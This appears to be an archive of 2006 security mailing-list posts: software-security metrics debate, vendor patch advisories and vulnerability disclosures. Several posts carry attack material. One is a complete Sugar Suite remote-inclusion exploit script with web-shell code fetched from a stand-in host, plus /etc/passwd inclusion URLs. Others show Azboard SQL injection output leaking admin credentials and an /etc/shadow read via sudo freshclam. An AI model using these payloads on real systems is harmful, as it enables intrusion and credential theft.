Re: How secure is software X?
On Fri, May 12, 2006 at 02:59:17AM +0100, David Litchfield wrote: How secure is software X? At least as secure as Vulnerability Assessment Assurance Level P; or Q or R. Well, that's what I think we should be able to say. What we need is an open standard, that has been agreed upon by recognized experts, against which the absence of software security vulnerability can be measured - something which improves upon the failings of the Common Criteria. The Trike threat modeling methodology has as it's goal being able to produce exactly this kind of formal model of software risk -- models which have a high degree of real world relevancy, can be reliably generated by multiple teams, and compared across both different applications and different versions of an application. We're strongest right now on architectural level issues; the further into the details of the implementation, the more complex the model becomes, obviously. That said, formal threat models provide a solid analysis foundation to build on, and can work nicely with either automated test suites or more ad-hoc methods, including heuristics like previous bugs filed, number of code audits, etc. You can find a bit more at www.octotrike.org, but we've taken some pretty big steps from the work that's documented there. /P. -- Ideas are my favorite toys. pgpMf2QBsbu81.pgp Description: PGP signature
Re: How secure is software X?
Dear David in my opinion a software can either be secure or not secure. I think it's a bit like a woman cannot be a bit pregnant. But the protocol you are talking about can be used to tell the secure from the insecure pieces of software. By applying a test for these rules against systems, security will definitely be enhanced since software brandmarked with insecure will simply loose it's value. Another question is how to verify that authors check their own software? If they do not do it by now, why then? The only reason I could imagine would be a raise in value by beeing able to say My software is a tested 'secure' one. My 2cts :) Bye Fabian Becker
PhpBB = 2.0.20 Admin/Restore Database remote cmmnds xctn (works with admin sid)
an admin or whoever succeed to find admin sid is able to launch commands, advisory/poc exploit: http://retrogod.altervista.org/phpbb_2020_admin_xpl.html
RE: Oracle - the last word
I politely disagree... if there are no measurements then there can be no metrics (or is that the other way around? :-) There has to be a start some place; i.e. in your examples, David's time can be recorded to the hour, and even the researcher/analyst could have a rating to compensate for skill difference. The suggestions/ideas put forth here in this thread are very interesting, IMO. Besides rating a software package solely on the number of vulnerabilities found, it's more accurate to include the time to patch the vulnerability by the vendor, and the time it takes a vendor to respond to a vulnerability report. These 2 factors could get a weighted rating and be combined with the # of vulnerabilities rating. Which would be a more accurate assessment of how safe is software X?. I can think of Windows OS vs. Linux OS, and IE vs. Firefox as perfect examples. Microsoft and its supporters will reference the number (and perhaps the criticality) of vulnerabilities, while not taking into account the patch and response time. Of course, this leads to other possible factors such as a vendor's patch delivery mechanism, but we can't not take on the task just because there isn't an immediate clear solution. Stephen Evans, CISSP --- Lee Kelly [EMAIL PROTECTED] wrote: Actually I would think this information would be only as good as the person doing the testing, and in fact may lead to a false timeline. To continue using Mr. Litchfield's example consider the following: - The bugs (regardless of number) found in a day could have been blatantly obvious; - The bugs that took two weeks to find may have been more technically obscure, or it may be that Mr. Litchfield had other things to do rather than spend all his time looking for bugs; - From this, and previous postings, I am going to take for granted that Mr. Litchfield is an Oracle expert although we have never met to my knowledge. That being said, how long would it take a novice (or someone less skilled) to find these same bugs. I think even Mr. Litchfield would agree that there are malicious people out there just as expert, maybe even more so, than he is regarding Oracle products. - Level of effort also has to take into account when the research started versus when the application/patch/upgrade was released. For example let's say that 10gR2 was released on April 1st (don't actually know, just picking a date) and Mr. Litchfield was on vacation or travel until April 8th. If it then took him two weeks to find these bugs the 'bad guys' will have had a week headstart over his research. I understand that more people than Mr. Litchfield are doing this research but this would need to be factored in the equation. All this being said -- I am not taking the position that this information would not be 'interesting', but I don't thing it would provide a more concrete answer to the question how secure is software X. Thank You, Lee Kelly, CISSP -Original Message- From: Steven M. Christey [mailto:[EMAIL PROTECTED] Sent: Wednesday, May 10, 2006 6:29 PM To: [EMAIL PROTECTED] Cc: bugtraq@securityfocus.com Subject: Re: Oracle - the last word David Litchfield said: When Oracle 10g Release 1 was released you could spend a day looking for bugs and find thirty. When 10g Release 2 was released I had to spend two weeks looking to find the same number. This increasing level of effort is likely happening for other major widely audited software products, too. It would be a very useful data point if researchers could publicly quantify how much time and effort they needed to find the issues (note: this is not my idea, it came out of various other discussions.) Level of effort might provide a more concrete answer to the question how secure is software X? Some researchers might not want to publicize this kind of information, but this would be one great way to help us move away from the primitive practice of counting the number of reported vulnerabilities. (and while I'm talking about quantifying researcher effort, it might be highly illustrative to measure how much time is spent in dealing with vendors during disclosure.) - Steve __ Do You Yahoo!? Tired of spam? Yahoo! Mail has the best spam protection around http://mail.yahoo.com
[SECURITY] [DSA 1057-1] New phpLDAPadmin packages fix cross-site scripting
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 1057-1[EMAIL PROTECTED] http://www.debian.org/security/ Martin Schulze May 15th, 2006 http://www.debian.org/security/faq - -- Package: phpldapadmin Vulnerability : missing input sanitising Problem type : remote Debian-specific: no CVE ID : CVE-2006-2016 BugTraq ID : 17643 Debian Bug : 365313 Several cross-site scripting vulnerabilities have been discovered in phpLDAPadmin, a web based interface for administering LDAP servers, tha allows remote attackers to inject arbitrary web script or HTML. The old stable distribution (woody) does not contain phpldapadmin packages. For the stable distribution (sarge) these problems have been fixed in version 0.9.5-3sarge3. For the unstable distribution (sid) these problems have been fixed in version 0.9.8.3-1. We recommend that you upgrade your phpldapadmin package. Upgrade Instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given at the end of this advisory: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.1 alias sarge - Source archives: http://security.debian.org/pool/updates/main/p/phpldapadmin/phpldapadmin_0.9.5-3sarge3.dsc Size/MD5 checksum: 619 0889400f9f965c338dff4c547ea046cd http://security.debian.org/pool/updates/main/p/phpldapadmin/phpldapadmin_0.9.5-3sarge3.diff.gz Size/MD5 checksum:12460 212a8a58288ba85121a0cd3ec86dc284 http://security.debian.org/pool/updates/main/p/phpldapadmin/phpldapadmin_0.9.5.orig.tar.gz Size/MD5 checksum: 617707 fb0669d4c4b8857387aef2630de8 Architecture independent components: http://security.debian.org/pool/updates/main/p/phpldapadmin/phpldapadmin_0.9.5-3sarge3_all.deb Size/MD5 checksum: 617970 3bb8628eb5ba813c653fe74d56520273 These files will probably be moved into the stable distribution on its next update. - - For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce@lists.debian.org Package info: `apt-cache show pkg' and http://packages.debian.org/pkg -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.3 (GNU/Linux) iD8DBQFEaI5MW5ql+IAeqTIRAhpCAJwOm1ZSJ6ORdUsYOsO8mTXi/nf3ZgCdGR+Y L2keerjA1onNQ6yPaDChxwo= =OtaI -END PGP SIGNATURE-
[USN-274-2] MySQL vulnerability
=== Ubuntu Security Notice USN-274-2 May 15, 2006 mysql-dfsg vulnerability CVE-2006-0903 === A security issue affects the following Ubuntu releases: Ubuntu 5.04 (Hoary Hedgehog) Ubuntu 5.10 (Breezy Badger) The following packages are affected: mysql-server The problem can be corrected by upgrading the affected package to version 4.0.23-3ubuntu2.4 (for Ubuntu 5.04), or 4.0.24-10ubuntu2.3 (for Ubuntu 5.10). In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: USN-274-1 fixed a logging bypass in the MySQL server. Unfortunately it was determined that the original update was not sufficient to completely fix the vulnerability, thus another update is necessary. We apologize for the inconvenience. For reference, these are the details of the original USN: A logging bypass was discovered in the MySQL query parser. A local attacker could exploit this by inserting NUL characters into query strings (even into comments), which would cause the query to be logged incompletely. This only affects you if you enabled the 'log' parameter in the MySQL configuration. Updated packages for Ubuntu 5.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg/mysql-dfsg_4.0.23-3ubuntu2.4.diff.gz Size/MD5: 347218 5bf62963f2439449d17429b974dc954e http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg/mysql-dfsg_4.0.23-3ubuntu2.4.dsc Size/MD5: 891 cf807937ea7cb09d1717c562c355e2cd http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg/mysql-dfsg_4.0.23.orig.tar.gz Size/MD5: 9814467 5eec8f66ed48c6ff92e73161651a492b Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg/mysql-common_4.0.23-3ubuntu2.4_all.deb Size/MD5:32366 1a3bd9d864cae3bfa1987f859b5624aa amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg/libmysqlclient12-dev_4.0.23-3ubuntu2.4_amd64.deb Size/MD5: 2867226 cee7c90e2a0fd2ab3d17ba1b25b74f0d http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg/libmysqlclient12_4.0.23-3ubuntu2.4_amd64.deb Size/MD5: 307670 e7fea674e9dcad07d491e70f80aefa77 http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg/mysql-client_4.0.23-3ubuntu2.4_amd64.deb Size/MD5: 431800 6b87ceedfa25337da77b1cb0f461526e http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg/mysql-server_4.0.23-3ubuntu2.4_amd64.deb Size/MD5: 3629366 3ae34465083080e3bf9d620f8cb8cb02 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg/libmysqlclient12-dev_4.0.23-3ubuntu2.4_i386.deb Size/MD5: 2827210 8efa7c02567c9728cd915d3c40e5a197 http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg/libmysqlclient12_4.0.23-3ubuntu2.4_i386.deb Size/MD5: 290266 d922e809d77b6b5dc3b4ed0b60aab4ca http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg/mysql-client_4.0.23-3ubuntu2.4_i386.deb Size/MD5: 405024 b44e2e31c97d7e53fe0c165c8857dae2 http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg/mysql-server_4.0.23-3ubuntu2.4_i386.deb Size/MD5: 3538020 3b77c2725479cf9167f0015ab6c84217 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg/libmysqlclient12-dev_4.0.23-3ubuntu2.4_powerpc.deb Size/MD5: 3181320 b9a3a84b59e90cebc93f0a19cc63c9ef http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg/libmysqlclient12_4.0.23-3ubuntu2.4_powerpc.deb Size/MD5: 313258 cbcdd0d05906c05ff730b1b75d04c860 http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg/mysql-client_4.0.23-3ubuntu2.4_powerpc.deb Size/MD5: 462556 3b7b56ceb6c3698ab404080a0692f5ec http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg/mysql-server_4.0.23-3ubuntu2.4_powerpc.deb Size/MD5: 3840116 63049c52217853f785162ba6d54f133d Updated packages for Ubuntu 5.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg/mysql-dfsg_4.0.24-10ubuntu2.3.diff.gz Size/MD5:99812 d274d44f9970d8b2489f2a70b033f77a http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg/mysql-dfsg_4.0.24-10ubuntu2.3.dsc Size/MD5: 966 2f2a9b55283f1d634dce18e558d92ba3 http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg/mysql-dfsg_4.0.24.orig.tar.gz Size/MD5: 9923794 aed8f335795a359f32492159e3edfaa3 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg/mysql-common_4.0.24-10ubuntu2.3_all.deb Size/MD5:35028 a2a4b01f8de78f0489b2fb1563cb5f7a amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg/libmysqlclient12-dev_4.0.24-10ubuntu2.3_amd64.deb
Is MS06-018 a DoS or a system compromise ?
There seems to be some confusion in MS Security Bulletin MS06-018, Vulnerability in Microsoft Distributed Transaction Coordinator. The bulletin itself (http://www.microsoft.com/technet/security/bulletin/ms06-018.mspx) states : An attacker could cause the Microsoft Distributed Transaction Coordinator (MSDTC) to stop responding. Note that the denial of service vulnerability would not allow an attacker to execute code or to elevate their user rights, but it could cause the affected system to stop accepting requests. whereas the linked download pages for both the Win2K and WinXP patches http://www.microsoft.com/downloads/details.aspx?familyid=8B98F380-0E5C-4B80-9710-95E1B35AFD83displaylang=en http://www.microsoft.com/downloads/details.aspx?familyid=D80B43B2-727B-46B6-82D1-F2CBD916FE32displaylang=en state : A security issue has been identified in the Microsoft Distributed Transaction Controller service that could allow an attacker to compromise your Windows-based system and gain control over it. The related McAfee advisory (http://seclists.org/lists/bugtraq/2006/May/0215.html) states : Exploitation can at most lead to a denial of service and therefore the risk factor is at medium. so I guess DoS is what it is ... but it would still be nice if someone in the know could confirm the download pages are wrong anyone from Microsoft here ? Cheers Nick Boyce -- One way to make your old car run better is to look up the price of a new model.
JDK 1.4.2_11, 1.5.0_06, unsigned applets consuming all free harddisk space
Hi y'all, Quite a while ago I was testing with applets and found this by accident. It is definitely not a big issue, but worth to mention, as I discovered that an applet was eating up all the free space on the harddrive by allocating a large file in the users hidden temp dir (filename is something like +~JF57558.tmp ). Even when leaving the page the applet continues to work due to the broken event management between the browser and the JVM and after quitting the browser the temp file is not deleted. Therefore it leaves the machine in a terrible state, with no available space left, necessary for automatic security updates. And I am just transferring zero bytes but more harmful payload is certainly possible. Java is supposed to work similar on all platforms (write once, crash everywhere :-). So please tell me whether the following link fills up your hard disk (use on your own RISK, of course): http://www.illegalaccess.org/exploit/FullDiskApplet.html I tested with Firefox 1.5.0.3 and JDK 1.4.2_11 on a WinXP box and on another XP machine with IE6 , JDK 1.5.0_06. But I doubt that Sun will ever fix the bug, as they know the issue since 2004. Cheers Marc
Re: PHPBB 2.0.20 persistent issues with avatars
On 12 May 2006 [EMAIL PROTECTED] wrote: (3) inject some php code inside jpeg files as EXIF metadata content: this, in combinations with third party vulnerable code can be used to compromise the server where PHP is installed. Should be enough to check for php code inside the temporary files before to copy the new avatar in images/avatars/ folder. I'd sure love to see the POC on this one. PHP by default needs exif to be enabled during installation in order to work with the image meta data. So in theory not enabling exif should cause this to be benign. With that said, do you have a POC? sources: http://www.zend.com/manual/ref.exif.php http://us2.php.net/exif http://www.php.net/image -- Paul Laudanski, Microsoft MVP Windows-Security Submit phish: http://castlecops.com/pirt [de] http://de.castlecops.com [en] http://castlecops.com [wiki] http://wiki.castlecops.com [family] http://cuddlesnkisses.com
90% of programs made in PHP5 and prior Full Path Disclosure vuln.
:Introduction: Normally one of the last steps when accessing to a web-server is to find the url where the web is installed (more common in RFD). This may be a hard step, if the RPD is the only bug in that server, but PHP programs have functions that unexpectedly can return lots of errors. ATTENTION This is a design Error made by the programmers of the affected php programms, PHP language by it is safe. *** Normally a Full Path Disclosure is not dangerous, but in this case the 90% of the programs written in PHP are vulnerable. This is a list of 21 tested programs, in their last release at 13/05/06, 19 are vulnerable: -paFileDB-Affected -PhpWiki -Affected (GET Data) -CuteNews-Affected (GET Data) -SMF -Affected (GET POST COOKIE) -phpBB -Not Affected -phpNuke -Affected -myBB-Affected (POST Data) -phpMyAdmin -Affected -PHProxy -Affected (Cookie Post Data) -phpSurveyor -Affected -vBulletin -Affected (POST Data) -PunBB -Affected (POST Data) -XMB -Affected (just some files) -IPB -Not Affected (some cases) -Quick Forum -Affected -FreeScene -Affected (POST Data) -EBB -Affected (just some files) -tinyBB -Affected (no filters xD) -SciELO -Affected (GET Data) -XOOPS -Affected (POST Data) -SquirrelMail-Affected The design-error AMAZINGLY USED is when you parse an Array into a function that spect a STRING. The mainly bug in PHP found was: PHPSESSID *or equivalent* equal to a null-array. when calling the function session_start(); will return an error like: Warning: session_start(): The session id contains invalid characters, valid characters are only a-z, A-Z and 0-9 in /%path%/test.php on line 3 ** NOTE ** This error also appears when calling with no value (that also bypass filters). This will also bypass all cleaning functions as: -htmlentities -urlencode -etc.. returning specting T_STRING error. :Solution: The only way to detect is to add to your filter the condition is_array(). Also, you have to clean with this all parameters incoming from $_REQUEST(cookie,get and post) :Other Solution: Disabling all errors and warnings in php.ini :Dangereous?: No, but a Path Disclosure can reveal sensitive information. :Impact: The path may contain the username of the account, includes file and path, version of software, drive were web is installed, etc.. :Note: I repeat. THIS IS NOT DANGEROUS, its only an aditional help you are giving to hackers that already have access to your server. :Research made by: sirdarckcat elhacker.net
[SECURITY] [DSA 1056-1] New webcalendar packages fix information leak
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 1056-1[EMAIL PROTECTED] http://www.debian.org/security/ Martin Schulze May 15th, 2006 http://www.debian.org/security/faq - -- Package: webcalendar Vulnerability : verbose error message Problem type : remote Debian-specific: no CVE ID : CVE-2006-2247 Debian Bug : 366927 David Maciejak noticed that webcalendar, a PHP-Based multi-user calendar, returns different error messages on login attempts for an invalid password and a non-existing user, allowing remote attackers to gain information about valid usernames. The old stable distribution (woody) does not contain a webcalendar package For the stable distribution (sarge) this problem has been fixed in version 0.9.45-4sarge4. For the unstable distribution (sid) this problem will be fixed soon. We recommend that you upgrade your webcalendar package. Upgrade Instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.1 alias sarge - Source archives: http://security.debian.org/pool/updates/main/w/webcalendar/webcalendar_0.9.45-4sarge4.dsc Size/MD5 checksum: 610 1a88e45355b0ca1a474eba42ac6c8eb4 http://security.debian.org/pool/updates/main/w/webcalendar/webcalendar_0.9.45-4sarge4.diff.gz Size/MD5 checksum:12135 a518268d52b8a4744dd31ae9a7b60d0c http://security.debian.org/pool/updates/main/w/webcalendar/webcalendar_0.9.45.orig.tar.gz Size/MD5 checksum: 612360 a6a66dc54cd293429b604fe6da7633a6 Architecture independent components: http://security.debian.org/pool/updates/main/w/webcalendar/webcalendar_0.9.45-4sarge4_all.deb Size/MD5 checksum: 629232 c83c6d64bf495a79cc6fad26b68708e0 These files will probably be moved into the stable distribution on its next update. - - For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce@lists.debian.org Package info: `apt-cache show pkg' and http://packages.debian.org/pkg -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.3 (GNU/Linux) iD8DBQFEaCXLW5ql+IAeqTIRAh9tAJ0ZOz5tDBmHuzvuyEuAOzY/+mk3ewCfW+SP 2fZR6yXTqQhElPBJ2OL3qUI= =GjbC -END PGP SIGNATURE-
DMA[2006-0514a] - 'ClamAV freshclam incorrect privilege drop'
DMA[2006-0514a] - 'ClamAV freshclam incorrect privilege drop' Author: Kevin Finisterre Vendor: http://www.clamav.net Product: 'ClamAV freshclam' References: http://www.digitalmunition.com/DMA[2006-0514a].txt http://www.markallan.co.uk/clamXav/ Description: Tomasz Kojm of the ClamAV team describes the following code snippet from freshclam as being for system administrators who know what they're doing. /* parse the config file */ if((cfgfile = getargl(opt, config-file))) { copt = getcfg(cfgfile, 1); } ... if(setgid(user-pw_gid)) { logg(^setgid(%d) failed.\n, (int) user-pw_gid); exit(61); } if(setuid(user-pw_uid)) { logg(^setuid(%d) failed.\n, (int) user-pw_uid); exit(61); } Tomasz feels that since [there are] no problem[s] in freshclam making any changes to the above code would have ... no real sense from a security point of view. My views on the otherhand are slightly different. The above code snippet was obviously put in place to control the uid with which the freshclam binary runs. The freshclam manual page even makes a blatant claim that freshclam will drop privileges. freshclam(1) Clam AntiVirus freshclam(1) NAME freshclam - update virus databases ... -u USER, --user USER Run as USER. By default (when started by root) freshclam drops privileges and works as the 'clamav' user. For a program that currently has no problems the ClamAV authors have certainly went to odd lengths to make sure that freshclam and aparantly its sister programs do not get run with root privs. Tomasz aptly pointed out to me that on page 12 of the ClamAV documentation http://www.clamav.net/doc/0.88.2/clamdoc.pdf that users are warned to some extent: WARNING: Never enable the SUID or SGID bits in Clam AntiVirus binaries. Given that freshclam should aparantly never be run as root I do not exactly get the point of going through the trouble of dropping privs. In the context of complete non privileged use there is no point for the above code at all. It seems as if it should simply be removed. In the event that you are either A) a user on a system with an administrator that doesn't know what he is doing, B) someone that has gained access freshclam via sudo or C) a user on a system with clamXav installed, you may notice the following behavior: As you can see freshclam actually does attempt to drop privs for some unknown reason. [EMAIL PROTECTED]:~$ sudo freshclam --on-update-execute=/usr/bin/id ClamAV update process started at Fri Mar 17 22:41:06 2006 SECURITY WARNING: NO SUPPORT FOR DIGITAL SIGNATURES See the FAQ at http://www.clamav.net/faq.html for an explanation. Downloading main.cvd [99%] main.cvd updated (version: 36, sigs: 44686, f-level: 7, builder: tkojm) Downloading daily.cvd [100%] daily.cvd updated (version: 1337, sigs: 1897, f-level: 7, builder: ccordes) Database updated (46583 signatures) from database.clamav.net (IP: 67.18.105.98) uid=1001(clamav) gid=1002(clamav) groups=1002(clamav) Unfortunately if you read the man page and *thought* that freshclam *actually* dropped privileges you were completely wrong. It seems that giving a user sudo access to freshclam is a bad idea if you consider the following example. [EMAIL PROTECTED]:~$ ls -al /etc/shadow -rw-r- 1 root shadow 797 2006-03-17 22:26 /etc/shadow [EMAIL PROTECTED]:~$ cat /etc/shadow cat: /etc/shadow: Permission denied Normally would not have permission to /etc/shadow however the shared config parser from freshclam helps spit the contents to the screen in the example which is being run on a linux machine. ./shared/cfgparser.c:303: fprintf(stderr, ERROR: Parse error at line %d: Unknown option %s.\n, line, name); [EMAIL PROTECTED]:~$ sudo freshclam --config-file=/etc/shadow ERROR: Parse error at line 1: Unknown option root:$1$Shootthis$shouldntbehere/:12881:0:9:7:::. ERROR: Can't parse the config file /etc/shadow You can see here that the setgid(user-pw_gid) and setuid(user-pw_uid) calls occur a bit too late to be of use to the getcfg() functione. I don't quite get why privs would be dropped when using --on-update-execute but not when --config-file is used. For that matter I don't get why one would drop privs at all if there was never intended to be any setuid like activity involved. If the setgid and setuid calls are to be used at all they should be placed before getcfg() is called. As a side note to the bug iteslt, after visiting the clamav binaries webpage at http://www.clamav.net/binary.html and viewing the following text Macintosh users may have found them selves installing clamXav: MacOS X * clamXav, a GUI for ClamAV running on MacOS X, is available at http://www.markallan.co.uk/clamXav (http://www.clamxav.com/). It includes a slightly modified version of ClamAV engine as a back end. ClamAV also ships with MacOS X 10.4 (Tiger)
Sugar Suite Open Source = 4.2 OptimisticLock! arbitrary remote inclusion exploit
#!/usr/bin/php -q -d short_open_tag=on ? echo Sugar Suite Open Source = 4.2 \OptimisticLock!\ arbitrary remote inclusion exploit\r\n; echo by rgod [EMAIL PROTECTED]; echo site: http://retrogod.altervista.org\r\n\r\n;; echo this is called the \five claws of Sun-tzu\\r\n\r\n; if ($argc5) { echo Usage: php .$argv[0]. host path location cmd OPTIONS\r\n; echo host: target server (ip/hostname)\r\n; echo path: path to sugar suite\r\n; echo location: an arbitrary location with the code to include\r\n; echo cmd: a shell command\r\n; echo Options:\r\n; echo-p[port]:specify a port other than 80\r\n; echo-P[ip:port]: specify a proxy\r\n; echo Examples:\r\n; echo php .$argv[0]. localhost /sugar/ http://somehost.com/shell.txt ls -la\r\n; echo php .$argv[0]. localhost /sugar/ http://somehost.com/shell.txt ls -la -p81\r\n; echo php .$argv[0]. localhost / http://somehost.com/shell.txt ls -la -P1.1.1.1:80\r\n\r\n; echo note, you need this code in http://somehost.com/shell.txt\r\n;; echo ?php\r\n; echo if (get_magic_quotes_gpc()){\$_REQUEST[\cmd\]=stripslashes(\$_REQUEST[\cmd\]);}\r\n; echo ini_set(\max_execution_time\,0);\r\n; echo echo \*delim*\;\r\n; echo passthru(\$_REQUEST[\cmd\]);\r\n; echo echo \*delim*\;\r\n; echo ?\r\n; die; } /* software site: http://www.sugarcrm.com/crm/ i) vulnerable code in modules/OptimisticLock/LockResolve.php: ... if(empty($GLOBALS['sugarEntry'])) die('Not A Valid Entry Point'); //--- the [EMAIL PROTECTED] protection, nearly in all files ... if(isset($_SESSION['o_lock_object'])){ global $beanFiles, $moduleList; $object = $_SESSION['o_lock_object']; require_once($beanFiles[$beanList[$_SESSION['o_lock_module']]]); $current_state = new $_SESSION['o_lock_class'](); $current_state-retrieve($object['id']); if(isset($_REQUEST['save'])){ $_SESSION['o_lock_fs'] = true; echo $_SESSION['o_lock_save']; die(); }else{ display_conflict_between_objects($object, $current_state-toArray(),$current_state-field_defs, $current_state-module_dir, $_SESSION['o_lock_class']); }}else{ echo 'No Locked Objects'; } ... you can include files from local remote resources and launch commands, poc: with register_globals = On allow_url_fopen = On: http://[target]/[path]/modules/OptimisticLock/LockResolve.php?GLOBALS[sugarEntry]=1_SESSION[o_lock_object]=1_SESSION[o_lock_module]=1beanList[1]=1beanFiles[1]=http://somehost.com/someshell.txt with register_globals = On: http://[target]/[path]/modules/OptimisticLock/LockResolve.php?GLOBALS[sugarEntry]=1_SESSION[o_lock_object]=1_SESSION[o_lock_module]=1beanList[1]=1beanFiles[1]=../../../../../../../../etc/passwd ii) arbitrary local inclusion issues in a lot of files: with register_globals = On magic_quotes_gpc = Off: http://[target]/[path]/modules/Administration/CustomizeFields.php?GLOBALS[sugarEntry]=1theme=../../../../../../../../../../etc/passwd%00 http://[target]/[path]/modules/Administration/Development.php?GLOBALS[sugarEntry]=1theme=../../../../../../../../../../etc/passwd%00 http://[target]/[path]/modules/Administration/DstFix.php?GLOBALS[sugarEntry]=1theme=../../../../../../../../../../etc/passwd%00 http://[target]/[path]/modules/Administration/index.php?GLOBALS[sugarEntry]=1theme=../../../../../../../../../../etc/passwd%00 http://[target]/[path]/include/SubPanel/SubPanelViewer.php?GLOBALS[sugarEntry]=1module=1record=1beanList[1]=1theme=../../../../../../../../../../../../etc/passwd%00 http://[target]/[path]/modules/Accounts/index.php?GLOBALS[sugarEntry]=1theme=../../../../../../../../../../../../etc/passwd%00 http://[target]/[path]/modules/Administration/Upgrade.php?GLOBALS[sugarEntry]=1theme=../../../../../../../../../../../../../etc/passwd%00 http://[target]/[path]/modules/Bugs/index.php?GLOBALS[sugarEntry]=1theme=../../../../../../../../../../../../../etc/passwd%00 http://[target]/[path]/modules/Calendar/index.php?GLOBALS[sugarEntry]=1theme=../../../../../../../../../../etc/passwd%00 http://[target]/[path]/modules/Calls/index.php?GLOBALS[sugarEntry]=1theme=../../../../../../../../../../../../../../etc/passwd%00 http://[target]/[path]/modules/CampaignLog/Forms.php?GLOBALS[sugarEntry]=1theme=../../../../../../../../../../../../etc/passwd%00 http://[target]/[path]/modules/Campaigns/Forms.php?GLOBALS[sugarEntry]=1theme=../../../../../../../../../../../../etc/passwd%00 http://[target]/[path]/modules/Campaigns/index.php?GLOBALS[sugarEntry]=1theme=../../../../../../../../../../../../etc/passwd%00 http://[target]/[path]/modules/CampaignTrackers/Forms.php?GLOBALS[sugarEntry]=1theme=../../../../../../../../../../../../etc/passwd%00 http://[target]/[path]/modules/Cases/index.php?GLOBALS[sugarEntry]=1theme=../../../../../../../../../../../../etc/passwd%00
Azboard = 1.0 Multiple Sql Injections
Title : Azboard = 1.0 Multiple Sql Injections Published : 2006.5.14 Author : x90c(#51221;#44221;#51452;)@chollian.net/~jyj9782/ Link : http://user.chol.com/~jyj9782/sec/azboard_advisory.txt 0x01 Summary Azboard is a web board written in asp (active server pages). It has a sql injection hole. so we can get the admin(bbs)'s Id and password and so on. let's start to see what is the code.. 0x02 Codes ~/azboard/list.asp: - 49:if searchstring then 50: sql=select count(board_idx) from board where search like '% searchstring %' and cate='cate' 51:else 52: sql=select count(board_idx) from board where cate='cate' 53:end if - above lines are vulnerable to sql attak as you can see. y0! ;)~ ~/azboard/admin_ok.asp: - 27: SQL = SELECT cate,admin_id,admin_pass,board_name FROM board_admin where admin_id='id' and cate='cate' - i found the fields('admin_id', 'admin_pass') and table('board_admin') in this file. 0x03 Exploit [EMAIL PROTECTED] exploits]# ls -al azboard_blue.c -rw-r--r--1 root root 4771 5#50900; 14 23:30 azboard_blue.c [EMAIL PROTECTED] exploits]# ls -al azboard_blue -rwxr-xr-x1 root root17163 5#50900; 14 23:30 azboard_blue [EMAIL PROTECTED] exploits]# [EMAIL PROTECTED] exploits]# make azboard_blue cc azboard_blue.c -o azboard_blue azboard_blue.c: In function `tu1': azboard_blue.c:55: warning: assignment makes pointer from integer without a cast azboard_blue.c:59: warning: assignment makes pointer from integer without a cast azboard_blue.c:63: warning: assignment makes pointer from integer without a cast azboard_blue.c:67: warning: assignment makes pointer from integer without a cast [EMAIL PROTECTED] exploits]# ./azboard_blue azaboard 1.0 = 0day : $ ./azboard_blue azboard URL cate ~ [EMAIL PROTECTED]/~jyj9782 [EMAIL PROTECTED] exploits]# [EMAIL PROTECTED] exploits]# ./azboard_blue http://192.168.0.5 testbbs [ LANG=KOR admin id ] admin [ LANG=KOR admin pass ] 1234 [EMAIL PROTECTED] exploits]# 0x04 Patch ~/azboard/list.asp: .. if instr(search, \') 0 or instr(cate, \') 0 or instr(cate, \') 0 then Response.redirect error.asp end if .. Thanks for many 0p3n-H4ck3rz! - Blu3h4t Team.
RealVNC 4.1.1 Remote Compromise
Rumors of this bug began spreading on Slashdot and other sites, thanks to Steve Wiseman of intelliadmin.com who serendipitously discovered it while writing a VNC client. At first it was only a rumor, as Steve's site gave scant details and he himself was surprised such a huge hole could possibly exist in such a widely deployed product. Here are the results of my research into this rumor. In the interests of full disclosure, the following message details a critical vulnerability in RealVNC's authentication protocol. Using the following method, it is trivial to gain access to any RealVNC server without knowing the password. This allows full control of the target machine, with privilege levels equalling that of the user under which the RealVNC server runs - often full Administrator access on Windows desktops. RealVNC is a widely used program which makes it possible to view and fully-interact with one computer from any other computer or mobile device anywhere on the Internet. (www.realvnc.com) As documented in rfbproto.pdf by Tristan Richardson, the RFB (remote frame buffer) protocol performs an initial handshake which allows clients and servers to negotiate 